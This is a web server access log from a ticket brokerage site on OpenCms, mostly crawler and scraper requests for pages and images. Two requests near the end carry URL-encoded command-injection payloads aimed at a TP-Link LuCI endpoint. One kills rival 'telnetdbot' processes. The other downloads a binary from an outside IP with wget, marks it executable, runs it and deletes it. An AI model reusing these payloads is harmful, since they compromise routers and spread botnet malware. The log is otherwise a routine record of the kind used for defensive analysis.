192.99.14.159 - - [29/Jun/2024:02:40:46 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FEDF232A-760C-B359-320A-5BD79D713F09&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.127.199 - - [29/Jun/2024:02:40:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/venue/scotiabankplace.gif HTTP/1.1" 200 32006
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.127.199 - - [29/Jun/2024:02:40:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.40.149 - - [29/Jun/2024:02:40:48 +0200] "GET /ticket2/opencms/no/buy/?catid=1656E964-1E02-9A38-D092-65384E60B6EA&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=6 HTTP/1.1" 200 77853
47.128.40.149 - - [29/Jun/2024:02:40:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.40.149 - - [29/Jun/2024:02:40:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.40.149 - - [29/Jun/2024:02:40:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.40.149 - - [29/Jun/2024:02:40:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.40.149 - - [29/Jun/2024:02:40:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.40.149 - - [29/Jun/2024:02:40:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.40.149 - - [29/Jun/2024:02:40:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:40:54 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FEDF232A-760C-B359-320A-5BD79D713F09&sortorder=asc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:02:40:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:40:58 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
192.99.14.159 - - [29/Jun/2024:02:41:01 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FF0D707F-990B-CB24-35A3-6484FE5500AF HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:41:09 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FF0D707F-990B-CB24-35A3-6484FE5500AF&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.19.242 - - [29/Jun/2024:02:41:13 +0200] "GET /ticket2/opencms/fi/buy/?catid=88C381AD-5D76-A34D-AC15-A7129F8EF5BE&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83452
47.128.19.242 - - [29/Jun/2024:02:41:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.19.242 - - [29/Jun/2024:02:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.19.242 - - [29/Jun/2024:02:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.19.242 - - [29/Jun/2024:02:41:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.19.242 - - [29/Jun/2024:02:41:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.19.242 - - [29/Jun/2024:02:41:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.19.242 - - [29/Jun/2024:02:41:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:41:15 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FF0D707F-990B-CB24-35A3-6484FE5500AF&sortorder=asc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:41:21 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FF0D707F-990B-CB24-35A3-6484FE5500AF&sortorder=asc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:41:29 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FF18A9C9-331A-E2D9-B8C7-EBC4245F1EB2&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.75.161 - - [29/Jun/2024:02:41:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
66.249.77.37 - - [29/Jun/2024:02:41:32 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/arsenal/ HTTP/1.1" 200 86480
66.249.75.106 - - [29/Jun/2024:02:41:34 +0200] "GET /ticket2/opencms/fi/buy/?page=1&edid=0F9D6B87-FBA2-98F6-6A11-CBBA4D2A86C1 HTTP/1.1" 200 117947
66.249.76.8 - - [29/Jun/2024:02:41:35 +0200] "GET /ticket2/opencms/en/venue/?countryid=99879305-CFA6-190E-0159-90B37D9BF760 HTTP/1.1" 200 100730
185.191.171.4 - - [29/Jun/2024:02:41:35 +0200] "GET /ticket2/opencms/sv/magazine/article?title=chelsea HTTP/1.1" 200 72096
47.128.40.206 - - [29/Jun/2024:02:41:36 +0200] "GET /ticket2/opencms/fi/venue/?venueid=D32D7D15-39F6-AD54-233F-8A09600A4A49 HTTP/1.1" 200 72978
192.99.14.159 - - [29/Jun/2024:02:41:39 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FF18A9C9-331A-E2D9-B8C7-EBC4245F1EB2&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.40.206 - - [29/Jun/2024:02:41:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/venue/Foro_Italico_Roma.png HTTP/1.1" 200 79333
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.40.206 - - [29/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.123.27 - - [29/Jun/2024:02:41:44 +0200] "GET /ticket2/opencms/no/buy/?catid=7D3BEF66-5D88-3916-5B89-0E7B139E0169&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=6 HTTP/1.1" 200 77858
47.128.123.27 - - [29/Jun/2024:02:41:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
37.60.238.15 - - [29/Jun/2024:02:41:45 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=22A38509-349B-CEBC-EA2F-719FED9069C4 HTTP/1.1" 404 -
47.128.123.27 - - [29/Jun/2024:02:41:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.123.27 - - [29/Jun/2024:02:41:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.123.27 - - [29/Jun/2024:02:41:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.123.27 - - [29/Jun/2024:02:41:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.123.27 - - [29/Jun/2024:02:41:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.123.27 - - [29/Jun/2024:02:41:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
192.99.14.159 - - [29/Jun/2024:02:41:46 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FFB17C01-ED75-27AF-8C5A-B4FCC8F6A8DC&sortorder=asc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:41:55 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FFD295A3-4EEF-0AC4-F4B4-46E2317B286E&sortorder=desc&column=price HTTP/1.1" 404 -
85.208.96.201 - - [29/Jun/2024:02:41:59 +0200] "GET /ticket2/opencms/nl/sport/ijshockeytickets/ HTTP/1.1" 200 69880
47.128.19.65 - - [29/Jun/2024:02:41:59 +0200] "GET /ticket2/opencms/fi/venue/?venueid=988CFED4-6B4C-E666-FAD2-FF27363C6BC5 HTTP/1.1" 200 73024
47.128.19.65 - - [29/Jun/2024:02:42:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.19.65 - - [29/Jun/2024:02:42:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.19.65 - - [29/Jun/2024:02:42:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.19.65 - - [29/Jun/2024:02:42:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.19.65 - - [29/Jun/2024:02:42:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.19.65 - - [29/Jun/2024:02:42:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.19.65 - - [29/Jun/2024:02:42:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:42:02 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FFE7AC64-DCEA-90F2-F563-995D821F5866&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.19.65 - - [29/Jun/2024:02:42:03 +0200] "GET /ticket2/opencms/venue/alas.png HTTP/1.1" 200 164435
192.99.14.159 - - [29/Jun/2024:02:42:09 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=FFE7AC64-DCEA-90F2-F563-995D821F5866&sortorder=desc&column=row HTTP/1.1" 404 -
85.208.96.196 - - [29/Jun/2024:02:42:13 +0200] "GET /ticket2/opencms/fi/search.html?searchQuery=Nashville HTTP/1.1" 200 93385
192.99.14.159 - - [29/Jun/2024:02:42:20 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=53E7B32E-5CAA-6CE7-D6AA-FFC41D70EE01&eventid=E0C4A95E-BD78-FF4A-FED9-4740EAE35C76 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:42:27 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=1656E964-1E02-9A38-D092-65384E60B6EA HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:42:34 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=2CCC191C-F37F-B9CA-D41C-1204E575B328 HTTP/1.1" 404 -
66.249.75.106 - - [29/Jun/2024:02:42:36 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=E9DB3A42-82BF-9B65-3ED4-EE5A32871388 HTTP/1.1" 200 106873
216.245.221.83 - - [29/Jun/2024:02:42:39 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:42:39 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
47.128.40.200 - - [29/Jun/2024:02:42:39 +0200] "GET /ticket2/opencms/dk/buy/?catid=B0817F4C-4B6F-A68C-6229-209BB05F84D4&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82252
192.99.14.159 - - [29/Jun/2024:02:42:40 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=6CD184E8-C8D4-E1CC-33D0-6F47E3751240 HTTP/1.1" 404 -
47.128.40.200 - - [29/Jun/2024:02:42:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.40.200 - - [29/Jun/2024:02:42:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.40.200 - - [29/Jun/2024:02:42:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.40.200 - - [29/Jun/2024:02:42:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.40.200 - - [29/Jun/2024:02:42:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.40.200 - - [29/Jun/2024:02:42:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.40.200 - - [29/Jun/2024:02:42:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
37.60.238.15 - - [29/Jun/2024:02:42:42 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=22A5BACF-2C57-D14B-B1F7-406A4B5B80A3 HTTP/1.1" 404 -
52.167.144.140 - - [29/Jun/2024:02:42:43 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=19E84C52-A446-E058-5C60-ACFF6737EAAA HTTP/1.1" 200 85185
47.128.46.14 - - [29/Jun/2024:02:42:43 +0200] "GET /ticket2/opencms/fr/buy/?edid=27182C30-0424-098E-A8DB-2AA3B88A1ABD HTTP/1.1" 200 72687
47.128.46.14 - - [29/Jun/2024:02:42:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.46.14 - - [29/Jun/2024:02:42:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.46.14 - - [29/Jun/2024:02:42:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.46.14 - - [29/Jun/2024:02:42:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.46.14 - - [29/Jun/2024:02:42:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.46.14 - - [29/Jun/2024:02:42:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.46.14 - - [29/Jun/2024:02:42:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
192.99.14.159 - - [29/Jun/2024:02:42:46 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=757E2DFB-33DA-9B34-8402-9F06B19D8409 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:42:52 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=7D3BEF66-5D88-3916-5B89-0E7B139E0169 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:42:59 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=81B744E7-1FEE-E757-C0AB-C7AF73CDE252 HTTP/1.1" 404 -
40.77.167.56 - - [29/Jun/2024:02:43:04 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/london/ HTTP/1.1" 200 78096
192.99.14.159 - - [29/Jun/2024:02:43:05 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=8B6802AF-1ADE-4BE1-A1F7-7671190CFB4F HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:43:17 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=DA31441B-C568-3C77-D08C-698809032494 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:43:24 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=F7F89B9B-6697-7881-54AE-4C39276BF1B8 HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:02:43:25 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=736BE71F-E4C1-8631-07B9-076E72E29705 HTTP/1.1" 404 -
52.167.144.19 - - [29/Jun/2024:02:43:28 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/mallorca/ HTTP/1.1" 200 73610
192.99.14.159 - - [29/Jun/2024:02:43:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=F7FF413B-5FDF-82CF-E5BB-CD4AB6027974 HTTP/1.1" 404 -
47.128.62.63 - - [29/Jun/2024:02:43:36 +0200] "GET /ticket2/opencms/fi/venue/?venueid=D32D7D15-39F6-AD54-233F-8A09600A4A49 HTTP/1.1" 200 72978
47.128.62.63 - - [29/Jun/2024:02:43:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.62.63 - - [29/Jun/2024:02:43:37 +0200] "GET /ticket2/opencms/venue/Foro_Italico_Roma.png HTTP/1.1" 200 79333
47.128.62.63 - - [29/Jun/2024:02:43:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.62.63 - - [29/Jun/2024:02:43:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.62.63 - - [29/Jun/2024:02:43:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.62.63 - - [29/Jun/2024:02:43:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.62.63 - - [29/Jun/2024:02:43:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.62.63 - - [29/Jun/2024:02:43:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
192.99.14.159 - - [29/Jun/2024:02:43:38 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=6762C018-7033-6B27-286C-F3EA400ED4E7 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:43:44 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=5B1CC88B-2BA7-8AA5-1109-77947DB3461F HTTP/1.1" 404 -
114.119.153.220 - - [29/Jun/2024:02:43:48 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=5E575581-BEB6-6AD9-3E20-8D577D889361 HTTP/1.1" 200 88493
141.98.83.197 - - [29/Jun/2024:02:43:48 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560for+proc_dir+in+%252Fproc%252F%255B0-9%255D%252A%253B+do+pid%253D%2524%257Bproc_dir%2523%2523%252A%252F%257D%253B+buffer%253D%2524%2528cat+%2522%252Fproc%252F%2524pid%252Fmaps%2522%2529%253B+if+%255B+%2522%2524%257B%2523buffer%257D%2522+-gt+1+%255D%253B+then+if+%255B+%2522%2524%257Bbuffer%2523%252A%2522%252Flib%252F%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D+%2526%2526+%255B+%2522%2524%257Bbuffer%2523%252A%2522telnetdbot%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D%253B+then+kill+-9+%2522%2524pid%2522%253B+fi%253B+fi%253B+done%2560) HTTP/1.1" 404 -
141.98.83.197 - - [29/Jun/2024:02:43:49 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560cd+%252Ftmp%253B+rm+-rf+shk%253B+wget+http%253A%252F%252F45.148.10.78%252Fshk%253B+chmod+777+shk%253B+.%252Fshk+tplink%253B+rm+-rf+shk%2560) HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:43:50 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=CB858627-FD0B-7DB5-96E3-81B2EDFB367F HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:43:56 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=A5EFB4D1-0D4A-6233-581F-53A6B8881498 HTTP/1.1" 404 -
17.241.75.213 - - [29/Jun/2024:02:44:02 +0200] "GET /ticket2/opencms/en/buy/?edid=4C433C59-5FE9-0C43-7DAC-788A4C3689C5&page=1 HTTP/1.1" 200 84521
192.99.14.159 - - [29/Jun/2024:02:44:05 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=ADA34653-9780-92A0-F3E5-C81C9CAB0420 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:44:09 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=EBF65105-8705-5548-45E5-1C731A311B76 HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:02:44:12 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=73886E8B-D0CE-D693-4D83-304172C400FE HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:44:18 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=45834EE8-C219-D703-E9BA-9F2A8B0B5D86 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:44:25 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=6EA9C6C1-4A98-9DDB-09DD-280525870AC5 HTTP/1.1" 404 -
47.128.40.14 - - [29/Jun/2024:02:44:32 +0200] "GET /ticket2/opencms/fi/venue/?venueid=C5443748-FE6D-78AE-9835-D6BA076EAF8D HTTP/1.1" 200 72977
192.99.14.159 - - [29/Jun/2024:02:44:32 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=7620AC05-C07D-20B0-5C26-2BB0AB225757 HTTP/1.1" 404 -
47.128.40.14 - - [29/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.40.14 - - [29/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.40.14 - - [29/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.40.14 - - [29/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.40.14 - - [29/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.40.14 - - [29/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.40.14 - - [29/Jun/2024:02:44:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
114.119.130.175 - - [29/Jun/2024:02:44:35 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=845586A6-1949-5539-2884-3A46607B22D7 HTTP/1.1" 200 88055
